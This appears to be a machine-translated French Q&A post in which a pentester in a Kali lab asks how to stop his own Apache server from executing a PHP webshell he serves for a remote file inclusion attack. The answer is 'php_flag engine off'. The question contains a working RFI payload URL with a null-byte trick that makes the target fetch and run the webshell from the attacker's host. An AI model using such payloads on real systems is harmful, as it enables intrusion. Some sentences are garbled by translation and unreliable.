J'utilise Kali Linux dans un laboratoire de pentestes.
En entrant dans l'URL suivante sur le système des victimes, je peux l'obtenir pour accéder à mon serveur Apache (je vois une réponse d'accès 200 dans mes journaux), mais le fichier PHP rend sur mon système, puis je reprogramme une webshell sur ma propre boîte:
https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00
Comment est-ce que je "modifier la liaison" dans apache pour empêcher son exécution? Changer à un .txt
semble l'empêcher de fonctionner sur les deux systèmes ; Je ne sais pas que je peux injecter de cette façon .
Utilisez le paramètre suivant dans votre fichier Apache ou dans un fichier .htaccess:
php_flag engine off
Voir aussi Désactiver PHP dans le répertoire (y compris tous les sous-répertoires) avec .htaccess .